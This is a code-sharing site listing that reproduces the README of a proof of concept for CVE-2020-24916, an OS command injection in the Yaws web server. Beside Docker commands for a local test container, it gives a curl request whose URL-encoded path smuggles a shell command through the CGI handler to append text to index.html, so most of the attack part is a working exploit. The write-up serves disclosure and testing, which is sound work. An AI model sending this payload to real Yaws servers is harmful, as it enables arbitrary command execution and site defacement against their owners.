poc-yaws-cgi-shell-injection
所属分类:CGI编程
开发工具:Dockerfile
文件大小:0KB
下载次数:0
上传日期:2020-09-06 21:16:40
上 传 者:
sh-1993
说明: 偏航web服务器OS命令注入POC
(Yaws web server OS command injection POC)
文件列表:
Dockerfile (227, 2020-09-06)
localhost.conf (150, 2020-09-06)
# OS command injection in Yaws web server (CVE-2020-24916)
## Proof of concept
Build test image:
`docker build -t vulnbe/yaws-pocs:shell-injection-appmod-cgi -f Dockerfile .`
and/or
Run container `docker run --rm -d -i -p 127.0.0.1:8000:8080 vulnbe/yaws-pocs:shell-injection-appmod-cgi`
```bash
curl 'http://127.0.0.1:8000/cgi-bin/%22%60export%20Z=$(pwd%7Ccut%20-c1);echo%20pawned%20completely%3E%3E..$Z%22%22index.html%60%22'
curl http://127.0.0.1:8000/index.html
```
## Credit
Alexey Pronin ([@vulnbe](https://twitter.com/vulnbe))
## References
* [Vulnerability analysis](https://vuln.be/post/yaws-xxe-and-shell-injections/)
* [Yaws on github](https://github.com/erlyaws/yaws)
* [CVE-2020-24916](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24916)
* [CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')](https://cwe.mitre.org/data/definitions/78.html)
近期下载者:
相关文件:
收藏者: